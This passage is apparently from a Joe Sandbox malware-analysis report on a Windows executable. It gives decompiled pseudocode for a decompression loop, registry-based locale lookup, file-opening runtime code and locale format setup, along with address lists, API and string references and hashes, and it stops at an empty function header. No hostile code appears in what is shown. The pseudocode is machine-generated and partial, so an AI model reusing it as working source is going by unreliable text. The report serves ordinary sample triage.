					_v76 =  *((intOrPtr*)(_v8 + 0x4c));
				}
				__eflags = _v56 - 0xfffffffe;
				if(_v56 != 0xfffffffe) {
					L12:
					_v108 = _v16 + _v24;
					while(1) {
						__eflags = _v56;
						if(_v56 == 0) {
							break;
						}
						__eflags = _v24 - _a8;
						if(_v24 < _a8) {
							_t458 = _t616 - _t617;
							__eflags = _t458 - _v72;
							if(_t458 >= _v72) {
								_t458 = _t458 + _v72;
								__eflags = _t458;
							}
							_t460 =  *((intOrPtr*)(_v68 + _t458));
							 *((char*)(_v68 + _t616)) = _t460;
							 *_v108 = _t460;
							_v24 = _v24 + 1;
							_v108 = _v108 + 1;
							_t616 = _t616 + 1;
							__eflags = _t616 - _v72;
							if(_t616 == _v72) {
								_t616 = 0;
								__eflags = 0;
							}
							_t116 =  &_v56;
							 *_t116 = _v56 - 1;
							__eflags =  *_t116;
							continue;
						}
						break;
					}
					__eflags = _t616;
					if(_t616 != 0) {
						_v25 =  *((intOrPtr*)(_v68 + _t616 - 1));
					} else {
						_v25 =  *((intOrPtr*)(_v68 + _v72 - 1));
					}
					__eflags = 0;
					_v116 = 0;
					_v112 = 0;
					while(1) {
						L24:
						_v108 = _v16 + _v24;
						__eflags = _v24 - _a8;
						if(_v24 >= _a8) {
							break;
						} else {
							goto L25;
						}
						while(1) {
							L25:
							_v88 = _v24 + _v60 & _v32;
							__eflags = _v116;
							if(_v116 != 0) {
								break;
							}
							__eflags = _v112;
							if(_v112 == 0) {
								_t370 = E0040813C((_t474 << 4) + (_t474 << 4) + _v20 + _v88 + _v88,  &_v136);
								__eflags = _t370;
								if(_t370 != 0) {
									_t375 = E0040813C(_t474 + _t474 + _v20 + 0x180,  &_v136);
									__eflags = _t375 != 1;
									if(_t375 != 1) {
										_v52 = _v48;
										_v48 = _v44;
										_v44 = _t617;
										__eflags = _t474 - 7;
										if(__eflags >= 0) {
											_t377 = 0xa;
										} else {
											_t377 = 7;
										}
										_t474 = _t377;
										_v56 = E004082EC(_v20 + 0x664, _v88,  &_v136, __eflags);
										_t503 =  &_v136;
										__eflags = _v56 - 4;
										if(_v56 >= 4) {
											_t381 = 3;
										} else {
											_t381 = _v56;
										}
										_v100 = E004081C4((_t381 << 6) + (_t381 << 6) + _v20 + 0x360, _t503, 6);
										__eflags = _v100 - 4;
										if(_v100 < 4) {
											_t618 = _v100;
										} else {
											_v104 = (_v100 >> 1) - 1;
											_t524 = _v104;
											_t622 = (_v100 & 0x00000001 | 0x00000002) << _v104;
											__eflags = _v100 - 0xe;
											if(_v100 >= 0xe) {
												_t395 = E004080DC( &_v136, _t524, _v104 + 0xfffffffc);
												_t618 = _t622 + (_t395 << 4) + E00408208(_v20 + 0x644,  &_v136, 4);
											} else {
												_t618 = _t622 + E00408208(_t622 + _t622 + _v20 + 0x560 - _v100 + _v100 + 0xfffffffe,  &_v136, _v104);
											}
										}
										_t617 = _t618 + 1;
										__eflags = _t617;
										if(_t617 != 0) {
											L82:
											_v56 = _v56 + 2;
											__eflags = _t617 - _v64;
											if(_t617 <= _v64) {
												__eflags = _v72 - _v64 - _v56;
												if(_v72 - _v64 <= _v56) {
													_v64 = _v72;
												} else {
													_v64 = _v64 + _v56;
												}
												while(1) {
													_t389 = _t616 - _t617;
													__eflags = _t389 - _v72;
													if(_t389 >= _v72) {
														_t389 = _t389 + _v72;
														__eflags = _t389;
													}
													_v25 =  *((intOrPtr*)(_v68 + _t389));
													 *((char*)(_v68 + _t616)) = _v25;
													_t616 = _t616 + 1;
													__eflags = _t616 - _v72;
													if(_t616 == _v72) {
														_t616 = 0;
														__eflags = 0;
													}
													_v56 = _v56 - 1;
													 *_v108 = _v25;
													_v24 = _v24 + 1;
													_v108 = _v108 + 1;
													__eflags = _v56;
													if(_v56 == 0) {
														break;
													}
													__eflags = _v24 - _a8;
													if(_v24 < _a8) {
														continue;
													}
													break;
												}
												L93:
												__eflags = _v24 - _a8;
												if(_v24 < _a8) {
													continue;
												}
												goto L94;
											}
											return 1;
										} else {
											_v56 = 0xffffffff;
											goto L94;
										}
									}
									_t411 = E0040813C(_t474 + _t474 + _v20 + 0x198,  &_v136);
									__eflags = _t411;
									if(_t411 != 0) {
										__eflags = E0040813C(_t474 + _t474 + _v20 + 0x1b0,  &_v136);
										if(__eflags != 0) {
											__eflags = E0040813C(_t474 + _t474 + _v20 + 0x1c8,  &_v136);
											if(__eflags != 0) {
												_t422 = _v52;
												_v52 = _v48;
											} else {
												_t422 = _v48;
											}
											_v48 = _v44;
										} else {
											_t422 = _v44;
										}
										_v44 = _t617;
										_t617 = _t422;
										L65:
										_v56 = E004082EC(_v20 + 0xa68, _v88,  &_v136, __eflags);
										__eflags = _t474 - 7;
										if(_t474 >= 7) {
											_t426 = 0xb;
										} else {
											_t426 = 8;
										}
										_t474 = _t426;
										goto L82;
									}
									__eflags = E0040813C((_t474 << 4) + (_t474 << 4) + _v20 + _v88 + _v88 + 0x1e0,  &_v136);
									if(__eflags != 0) {
										goto L65;
									}
									__eflags = _v64;
									if(_v64 != 0) {
										__eflags = _t474 - 7;
										if(_t474 >= 7) {
											_t508 = 0xb;
										} else {
											_t508 = 9;
										}
										_t474 = _t508;
										_t435 = _t616 - _t617;
										__eflags = _t435 - _v72;
										if(_t435 >= _v72) {
											_t435 = _t435 + _v72;
											__eflags = _t435;
										}
										_v25 =  *((intOrPtr*)(_v68 + _t435));
										 *((char*)(_v68 + _t616)) = _v25;
										_t616 = _t616 + 1;
										__eflags = _t616 - _v72;
										if(_t616 == _v72) {
											_t616 = 0;
											__eflags = 0;
										}
										 *_v108 = _v25;
										_v24 = _v24 + 1;
										__eflags = _v64 - _v72;
										if(_v64 < _v72) {
											_v64 = _v64 + 1;
										}
										goto L24;
									}
									return 1;
								}
								_t448 = (((_v24 + _v60 & _v36) << _v40) + (0 >> 8 - _v40) << 8) + (((_v24 + _v60 & _v36) << _v40) + (0 >> 8 - _v40) << 8) * 2 + (((_v24 + _v60 & _v36) << _v40) + (0 >> 8 - _v40) << 8) + (((_v24 + _v60 & _v36) << _v40) + (0 >> 8 - _v40) << 8) * 2 + _v20 + 0xe6c;
								__eflags = _t474 - 7;
								if(__eflags < 0) {
									_v25 = E0040824C(_t448,  &_v136, __eflags);
								} else {
									_v96 = _t616 - _t617;
									__eflags = _v96 - _v72;
									if(__eflags >= 0) {
										_t161 =  &_v96;
										 *_t161 = _v96 + _v72;
										__eflags =  *_t161;
									}
									_v89 =  *((intOrPtr*)(_v68 + _v96));
									_v25 = E00408278(_t448, _v89,  &_v136, __eflags);
								}
								 *_v108 = _v25;
								_v24 = _v24 + 1;
								_v108 = _v108 + 1;
								__eflags = _v64 - _v72;
								if(_v64 < _v72) {
									_t180 =  &_v64;
									 *_t180 = _v64 + 1;
									__eflags =  *_t180;
								}
								 *((char*)(_v68 + _t616)) = _v25;
								_t616 = _t616 + 1;
								__eflags = _t616 - _v72;
								if(_t616 == _v72) {
									_t616 = 0;
									__eflags = 0;
								}
								__eflags = _t474 - 4;
								if(_t474 >= 4) {
									__eflags = _t474 - 0xa;
									if(_t474 >= 0xa) {
										_t474 = _t474 - 6;
									} else {
										_t474 = _t474 - 3;
									}
								} else {
									_t474 = 0;
								}
								goto L93;
							}
							return 1;
						}
						return _v116;
					}
					L94:
					 *((intOrPtr*)(_v8 + 0x20)) = _v128;
					 *((intOrPtr*)(_v8 + 0x24)) = _v124;
					 *((intOrPtr*)(_v8 + 0x28)) = _t616;
					 *((intOrPtr*)(_v8 + 0x2c)) = _v60 + _v24;
					 *((intOrPtr*)(_v8 + 0x30)) = _v64;
					 *((intOrPtr*)(_v8 + 0x34)) = _t617;
					 *((intOrPtr*)(_v8 + 0x38)) = _v44;
					 *((intOrPtr*)(_v8 + 0x3c)) = _v48;
					 *((intOrPtr*)(_v8 + 0x40)) = _v52;
					 *(_v8 + 0x44) = _t474;
					 *((intOrPtr*)(_v8 + 0x48)) = _v56;
					 *((char*)(_v8 + 0x4c)) = _v76;
					 *((intOrPtr*)(_v8 + 0x14)) = _v136;
					 *((intOrPtr*)(_v8 + 0x18)) = _v132;
					 *_a4 = _v24;
					__eflags = 0;
					return 0;
				}
				_v80 = (0x300 <<  *(_v8 + 4) + _v40) + 0x736;
				_v84 = 0;
				_v108 = _v20;
				__eflags = _v84 - _v80;
				if(_v84 >= _v80) {
					L7:
					_v52 = 1;
					_v48 = 1;
					_v44 = 1;
					_t617 = 1;
					_v60 = 0;
					_v64 = 0;
					_t474 = 0;
					_t616 = 0;
					 *((char*)(_v68 + _v72 - 1)) = 0;
					E0040809C( &_v136);
					__eflags = _v116;
					if(_v116 != 0) {
						return _v116;
					}
					__eflags = _v112;
					if(_v112 == 0) {
						__eflags = 0;
						_v56 = 0;
						goto L12;
					} else {
						return 1;
					}
				} else {
					goto L6;
				}
				do {
					L6:
					 *_v108 = 0x400;
					_v84 = _v84 + 1;
					_v108 = _v108 + 2;
					__eflags = _v84 - _v80;
				} while (_v84 < _v80);
				goto L7;
			}

0x004083f0
0x004083f3
0x004083f6
0x00408401
0x00408404
0x00408415
0x00408426
0x0040842e
0x00408437
0x0040843d
0x00408443
0x0040844c
0x00408455
0x0040845e
0x00408467
0x00408470
0x00408479
0x00408482
0x0040848b
0x00408491
0x0040849a
0x004084a0
0x004084a9
0x004084b7
0x004084bd
0x004084c3
0x00000000
0x004084c5
0x004084cc
0x004084d0
0x004084d5
0x004084d8
0x004084e5
0x004084e5
0x004084e8
0x004084ec
0x0040858d
0x00408596
0x004085cb
0x004085cb
0x004085cf
0x00000000
0x00000000
0x004085d4
0x004085d7
0x0040859d
0x0040859f
0x004085a2
0x004085a4
0x004085a4
0x004085a4
0x004085b1
0x004085b2
0x004085b8
0x004085ba
0x004085bd
0x004085c0
0x004085c1
0x004085c4
0x004085c6
0x004085c6
0x004085c6
0x004085c8
0x004085c8
0x004085c8
0x00000000
0x004085c8
0x00000000
0x004085d7
0x004085d9
0x004085db
0x004085f3
0x004085dd
0x004085e7
0x004085e7
0x004085f8
0x004085fa
0x004085fd
0x00408600
0x00408600
0x00408609
0x0040860f
0x00408612
0x00000000
0x00000000
0x00000000
0x00000000
0x00408618
0x00408618
0x00408621
0x00408624
0x00408628
0x00000000
0x00000000
0x00408632
0x00408636
0x00408659
0x0040865e
0x00408660
0x00408739
0x0040873e
0x0040873f
0x0040887f
0x00408885
0x00408888
0x0040888b
0x0040888e
0x00408897
0x00408890
0x00408890
0x00408890
0x0040889c
0x004088b4
0x004088b7
0x004088bd
0x004088c1
0x004088c8
0x004088c3
0x004088c3
0x004088c3
0x004088e4
0x004088e7
0x004088eb
0x00408964
0x004088ed
0x004088f3
0x004088f6
0x00408902
0x00408904
0x00408908
0x0040893e
0x00408960
0x0040890a
0x0040892e
0x0040892e
0x00408908
0x00408967
0x00408967
0x00408968
0x00408973
0x00408973
0x00408977
0x0040897a
0x0040898c
0x0040898f
0x0040899c
0x00408991
0x00408994
0x00408994
0x0040899f
0x004089a1
0x004089a3
0x004089a6
0x004089a8
0x004089a8
0x004089a8
0x004089b1
0x004089ba
0x004089bd
0x004089be
0x004089c1
0x004089c3
0x004089c3
0x004089c3
0x004089c5
0x004089ce
0x004089d0
0x004089d3
0x004089d6
0x004089da
0x00000000
0x00000000
0x004089df
0x004089e2
0x00000000
0x00000000
0x00000000
0x004089e2
0x004089e4
0x004089e7
0x004089ea
0x00000000
0x00000000
0x00000000
0x004089ea
0x00000000
0x0040896a
0x0040896a
0x00000000
0x0040896a
0x00408968
0x00408757
0x0040875c
0x0040875e
0x0040880e
0x00408810
0x0040882e
0x00408830
0x00408837
0x0040883d
0x00408832
0x00408832
0x00408832
0x00408843
0x00408812
0x00408812
0x00408812
0x00408846
0x00408849
0x0040884b
0x00408861
0x00408864
0x00408867
0x00408870
0x00408869
0x00408869
0x00408869
0x00408875
0x00000000
0x00408875
0x00408785
0x00408787
0x00000000
0x00000000
0x0040878d
0x00408791
0x0040879d
0x004087a0
0x004087a9
0x004087a2
0x004087a2
0x004087a2
0x004087ae
0x004087b2
0x004087b4
0x004087b7
0x004087b9
0x004087b9
0x004087b9
0x004087c2
0x004087cb
0x004087ce
0x004087cf
0x004087d2
0x004087d4
0x004087d4
0x004087d4
0x004087dc
0x004087de
0x004087e4
0x004087e7
0x004087ed
0x004087ed
0x00000000
0x004087e7
0x00000000
0x00408793
0x00408690
0x00408695
0x00408698
0x004086d9
0x0040869a
0x0040869e
0x004086a4
0x004086a7
0x004086ac
0x004086ac
0x004086ac
0x004086ac
0x004086b8
0x004086c9
0x004086c9
0x004086e2
0x004086e4
0x004086e7
0x004086ed
0x004086f0
0x004086f2
0x004086f2
0x004086f2
0x004086f2
0x004086fb
0x004086fe
0x004086ff
0x00408702
0x00408704
0x00408704
0x00408704
0x00408706
0x00408709
0x00408712
0x00408715
0x0040871f
0x00408717
0x00408717
0x00408717
0x0040870b
0x0040870b
0x0040870b
0x00000000
0x00408709
0x00000000
0x00408638
0x00000000
0x0040862a
0x004089f0
0x004089f6
0x004089ff
0x00408a05
0x00408a11
0x00408a1a
0x00408a20
0x00408a29
0x00408a32
0x00408a3b
0x00408a41
0x00408a4a
0x00408a53
0x00408a5f
0x00408a68
0x00408a71
0x00408a73
0x00000000
0x00408a73
0x00408509
0x0040850c
0x00408514
0x0040851a
0x0040851d
0x00408536
0x0040853d
0x00408540
0x00408543
0x00408546
0x00408548
0x0040854d
0x00408550
0x00408558
0x0040855a
0x00408565
0x0040856a
0x0040856e
0x00000000
0x00408570
0x00408578
0x0040857c
0x00408588
0x0040858a
0x00000000
0x0040857e
0x00000000
0x0040857e
0x00000000
0x00000000
0x00000000
0x0040851f
0x0040851f
0x00408522
0x00408527
0x0040852a
0x00408531
0x00408531
0x00000000

Memory Dump Source

Source File: 00000000.00000002.324946827.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.324942483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324955743.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324961165.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
Instruction ID: dd5bcfe43659cf13d339026f7ad3ea52b8e70fb20ee6bb96b4ba17e57606c0dd
Opcode Fuzzy Hash: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
Instruction Fuzzy Hash: 8532F875E00219DFCB14CF99CA80AADB7B2BF88314F24816AD855B7385DB34AE42CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00406FFC Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 86
registrylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E00406FFC(void* __ebx, void* __edi, void* __esi) {
				void* _v8;
				char _v12;
				char _v16;
				char _v20;
				intOrPtr* _t50;
				intOrPtr _t64;
				void* _t72;

				_v20 = 0;
				_v12 = 0;
				_push(_t72);
				_push(0x407101);
				_push( *[fs:eax]);
				 *[fs:eax] = _t72 + 0xfffffff0;
				_t50 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "GetUserDefaultUILanguage");
				if(_t50 == 0) {
					if( *0x40b07c != 2) {
						if(E00406F40(0, "Control Panel\\Desktop\\ResourceLocale", 0x80000001,  &_v8, 1, 0) == 0) {
							E00406F34();
							RegCloseKey(_v8);
						}
					} else {
						if(E00406F40(0, ".DEFAULT\\Control Panel\\International", 0x80000003,  &_v8, 1, 0) == 0) {
							E00406F34();
							RegCloseKey(_v8);
						}
					}
					E0040322C( &_v20, E004071A4);
					E004032FC( &_v20, _v12);
					E004027B4(_v20,  &_v16);
					if(_v16 != 0) {
					}
				} else {
					 *_t50();
				}
				_pop(_t64);
				 *[fs:eax] = _t64;
				_push(E00407108);
				E00403198( &_v20);
				return E00403198( &_v12);
			}

0x00407007
0x0040700a
0x0040700f
0x00407010
0x00407015
0x00407018
0x00407030
0x00407034
0x00407046
0x0040709b
0x004070a8
0x004070b1
0x004070b1
0x00407048
0x00407063
0x00407070
0x00407079
0x00407079
0x00407063
0x004070be
0x004070c9
0x004070d4
0x004070df
0x004070df
0x00407036
0x00407036
0x00407038
0x004070e5
0x004070e8
0x004070eb
0x004070f3
0x00407100

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00407101,?,00000000,004098A8), ref: 00407025
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040702B
RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00407101,?,00000000,004098A8), ref: 00407079

Strings

.DEFAULT\Control Panel\International, xrefs: 00407050
GetUserDefaultUILanguage, xrefs: 0040701B
Control Panel\Desktop\ResourceLocale, xrefs: 00407088
Locale, xrefs: 00407068
kernel32.dll, xrefs: 00407020

Memory Dump Source

Source File: 00000000.00000002.324946827.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.324942483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324955743.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324961165.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: AddressCloseHandleModuleProc
String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
API String ID: 4190037839-2401316094
Opcode ID: e4cdd608a86d815a926e6585fdd4183a948931fd5e92426b53b2d27eb304baec
Instruction ID: 0122c662096f947522fbf27c68d7ba2278f12f4f8055e3519ce207c1ef0c72e4
Opcode Fuzzy Hash: e4cdd608a86d815a926e6585fdd4183a948931fd5e92426b53b2d27eb304baec
Instruction Fuzzy Hash: 64215330E44209ABDB10EBE5CC52B9F77A9EB44304F50457BA510F72C1EB7CAA058B5A

Uniqueness

Uniqueness Score: -1.00%

Function 00403A97 Relevance: 15.1, APIs: 10, Instructions: 122
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403A97(void** __eax) {
				void* _t25;
				long _t26;
				void* _t27;
				long _t30;
				void* _t34;
				void* _t36;
				long _t37;
				int _t40;
				void* _t42;
				void* _t48;
				void* _t49;
				long _t50;
				long _t51;
				void* _t54;
				void** _t55;
				DWORD* _t56;

				_t55 = __eax;
				 *((intOrPtr*)(__eax + 0xc)) = 0;
				 *((intOrPtr*)(__eax + 0x10)) = 0;
				_t25 =  *((intOrPtr*)(__eax + 4)) - 0xd7b1;
				if(_t25 == 0) {
					_t26 = 0x80000000;
					_t51 = 2;
					_t50 = 3;
					 *((intOrPtr*)(__eax + 0x1c)) = E00403A28;
					L8:
					_t55[9] = 0x403a7f;
					_t55[8] = E00403A4F;
					if(_t55[0x12] == 0) {
						_t55[9] = E00403A4F;
						if(_t55[1] == 0xd7b2) {
							_t27 = GetStdHandle(0xfffffff5);
						} else {
							_t27 = GetStdHandle(0xfffffff6);
						}
						if(_t27 == 0xffffffff) {
							L35:
							_t55[1] = 0xd7b0;
							return GetLastError();
						} else {
							 *_t55 = _t27;
							L28:
							if(_t55[1] == 0xd7b1) {
								L32:
								return 0;
							}
							_t30 = GetFileType( *_t55);
							if(_t30 == 0) {
								CloseHandle( *_t55);
								_t55[1] = 0xd7b0;
								return 0x69;
							}
							if(_t30 == 2) {
								_t55[8] = E00403A52;
							}
							goto L32;
						}
					}
					_t34 = CreateFileA( &(_t55[0x12]), _t26, _t51, 0, _t50, 0x80, 0);
					if(_t34 == 0xffffffff) {
						goto L35;
					}
					 *_t55 = _t34;
					if(_t55[1] != 0xd7b3) {
						goto L28;
					}
					_t55[1] = _t55[1] - 1;
					_t36 = GetFileSize( *_t55, 0) + 1;
					if(_t36 == 0) {
						goto L35;
					}
					_t37 = _t36 - 0x81;
					if(_t37 < 0) {
						_t37 = 0;
					}
					if(SetFilePointer( *_t55, _t37, 0, 0) + 1 == 0) {
						goto L35;
					} else {
						_t40 = ReadFile( *_t55,  &(_t55[0x53]), 0x80, _t56, 0);
						_t54 = 0;
						if(_t40 != 1) {
							goto L35;
						}
						_t42 = 0;
						while(_t42 < _t54) {
							if( *((char*)(_t55 + _t42 + 0x14c)) == 0x1a) {
								if(SetFilePointer( *_t55, _t42 - _t54, 0, 2) + 1 == 0 || SetEndOfFile( *_t55) != 1) {
									goto L35;
								} else {
									goto L28;
								}
							}
							_t42 = _t42 + 1;
						}
						goto L28;
					}
				}
				_t48 = _t25 - 1;
				if(_t48 == 0) {
					_t26 = 0x40000000;
					_t51 = 1;
					_t50 = 2;
					L7:
					_t55[7] = E00403A52;
					goto L8;
				}
				_t49 = _t48 - 1;
				if(_t49 == 0) {
					_t26 = 0xc0000000;
					_t51 = 1;
					_t50 = 3;
					goto L7;
				}
				return _t49;
			}

0x00403a98
0x00403a9c
0x00403a9f
0x00403aa5
0x00403aaa
0x00403ab7
0x00403abc
0x00403ac1
0x00403ac6
0x00403af6
0x00403af6
0x00403afd
0x00403b08
0x00403bbc
0x00403bca
0x00403bd2
0x00403bcc
0x00403bd2
0x00403bd2
0x00403bda
0x00403c17
0x00403c17
0x00000000
0x00403bdc
0x00403bdc
0x00403bde
0x00403be5
0x00403bfe
0x00000000
0x00403bfe
0x00403be9
0x00403bf0
0x00403c04
0x00403c09
0x00000000
0x00403c10
0x00403bf5
0x00403bf7
0x00403bf7
0x00000000
0x00403bf5
0x00403bda
0x00403b1e
0x00403b26
0x00000000
0x00000000
0x00403b2c
0x00403b35
0x00000000
0x00000000
0x00403b3b
0x00403b47
0x00403b48
0x00000000
0x00000000
0x00403b4e
0x00403b53
0x00403b55
0x00403b55
0x00403b64
0x00000000
0x00403b6a
0x00403b7f
0x00403b84
0x00403b86
0x00000000
0x00000000
0x00403b8c
0x00403b8e
0x00403b9a
0x00403bae
0x00000000
0x00403bba
0x00000000
0x00403bba
0x00403bae
0x00403b9c
0x00403b9c
0x00000000
0x00403b8e
0x00403b64
0x00403aac
0x00403aad
0x00403acf
0x00403ad4
0x00403ad9
0x00403aef
0x00403aef
0x00000000
0x00403aef
0x00403aaf
0x00403ab0
0x00403ae0
0x00403ae5
0x00403aea
0x00000000
0x00403aea
0x00000000

APIs

CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B1E
GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B42
SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B5E
ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00403B7F
SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00403BA8
SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00403BB2
GetStdHandle.KERNEL32(000000F5), ref: 00403BD2
GetFileType.KERNEL32(?,000000F5), ref: 00403BE9
CloseHandle.KERNEL32(?,?,000000F5), ref: 00403C04
GetLastError.KERNEL32(000000F5), ref: 00403C1E

Memory Dump Source

Source File: 00000000.00000002.324946827.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.324942483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324955743.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324961165.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
String ID:
API String ID: 1694776339-0
Opcode ID: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
Instruction ID: 6684f6b4d1923fa93cc5777a7ebe0ca766b8c5f16b1f456132d2f0a6dbb27d3d
Opcode Fuzzy Hash: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
Instruction Fuzzy Hash: 444194302042009EF7305F258805B237DEDEB4571AF208A3FA1D6BA6E1E77DAE419B5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040538C Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 167
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E0040538C(void* __ebx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				intOrPtr _t148;
				intOrPtr _t156;

				_t153 = __esi;
				_t152 = __edi;
				_push(0);
				_push(0);
				_push(0);
				_push(__esi);
				_push(__edi);
				_push(_t156);
				_push(0x4055d4);
				_push( *[fs:eax]);
				 *[fs:eax] = _t156;
				_t104 = GetSystemDefaultLCID();
				E004051D4(_t31, 0, 0x14,  &_v16);
				E004031E8(0x40c494, _t104, _v16, __edi, __esi);
				E004051D4(_t104, 0x4055ec, 0x1b,  &_v16);
				 *0x40c498 = E00404C8C(0x4055ec, 0);
				E004051D4(_t104, 0x4055ec, 0x1c,  &_v16);
				 *0x40c499 = E00404C8C(0x4055ec, 0);
				 *0x40c49a = E00405220(_t104, 0x2c, 0xf);
				 *0x40c49b = E00405220(_t104, 0x2e, 0xe);
				E004051D4(_t104, 0x4055ec, 0x19,  &_v16);
				 *0x40c49c = E00404C8C(0x4055ec, 0);
				 *0x40c49d = E00405220(_t104, 0x2f, 0x1d);
				E004051D4(_t104, "m/d/yy", 0x1f,  &_v16);
				E004031E8(0x40c4a0, _t104, _v16, _t152, _t153);
				E004051D4(_t104, "mmmm d, yyyy", 0x20,  &_v16);
				E004031E8(0x40c4a4, _t104, _v16, _t152, _t153);
				 *0x40c4a8 = E00405220(_t104, 0x3a, 0x1e);
				E004051D4(_t104, 0x405620, 0x28,  &_v16);
				E004031E8(0x40c4ac, _t104, _v16, _t152, _t153);
				E004051D4(_t104, 0x40562c, 0x29,  &_v16);
				E004031E8(0x40c4b0, _t104, _v16, _t152, _t153);
				E004051D4(_t104, 0x4055ec, 0x25,  &_v16);
				if(E00404C8C(0x4055ec, 0) != 0) {
					E0040322C( &_v8, 0x405644);
				} else {
					E0040322C( &_v8, 0x405638);
				}
				E004051D4(_t104, 0x4055ec, 0x23,  &_v16);
				if(E00404C8C(0x4055ec, 0) != 0) {
					E00403198( &_v12);
				} else {
					E0040322C( &_v12, 0x405650);
				}
				_push(_v8);
				_push(":mm");
				_push(_v12);
				E004033B4();
				_push(_v8);
				_push(":mm:ss");
				_push(_v12);
				E004033B4();
				_pop(_t148);
				 *[fs:eax] = _t148;
				_push(E004055DB);
				return E004031B8( &_v16, 3);
			}

0x0040538c
0x0040538c
0x0040538f
0x00405391
0x00405393
0x00405396
0x00405397
0x0040539a
0x0040539b
0x004053a0
0x004053a3
0x004053ab
0x004053ba
0x004053c7
0x004053dc
0x004053eb
0x00405400
0x0040540f
0x00405422
0x00405435
0x0040544a
0x00405459
0x0040546c
0x00405481
0x0040548e
0x004054a3
0x004054b0
0x004054c3
0x004054d8
0x004054e5
0x004054fa
0x00405507
0x0040551c
0x0040552d
0x00405546
0x0040552f
0x00405537
0x00405537
0x0040555b
0x0040556c
0x00405580
0x0040556e
0x00405576
0x00405576
0x00405585
0x00405588
0x0040558d
0x0040559a
0x0040559f
0x004055a2
0x004055a7
0x004055b4
0x004055bb
0x004055be
0x004055c1
0x004055d3

APIs

GetSystemDefaultLCID.KERNEL32(00000000,004055D4,?,?,?,?,00000000,00000000,00000000,?,004065B3,00000000,004065C6), ref: 004053A6

Part of subcall function 004051D4: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,0040529F,?,00000000,0040537E), ref: 004051F2

Part of subcall function 00405220: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,00405422,?,?,?,00000000,004055D4), ref: 00405233

Strings

mmmm d, yyyy, xrefs: 00405497
AMPM, xrefs: 00405571
:mm:ss, xrefs: 004055A2
m/d/yy, xrefs: 00405475
:mm, xrefs: 00405588

Memory Dump Source

Source File: 00000000.00000002.324946827.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.324942483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324955743.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324961165.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: InfoLocale$DefaultSystem
String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
API String ID: 1044490935-665933166
Opcode ID: 47320c1691e2d5830df5a1e9df4f03a140e2f23ae2973b8188fbf3949c00dbe8
Instruction ID: a3045b163c376a24327c8e5b5e6236da3fb850d103bdf6bcd60558380790f3b8
Opcode Fuzzy Hash: 47320c1691e2d5830df5a1e9df4f03a140e2f23ae2973b8188fbf3949c00dbe8
Instruction Fuzzy Hash: 6B513034B00548ABDB04EBA59C91B9F776ADB88304F60947BB505BF3C6CA7DDA058B1C

Uniqueness

Uniqueness Score: -1.00%

Function 0040457C Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 20
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 50%

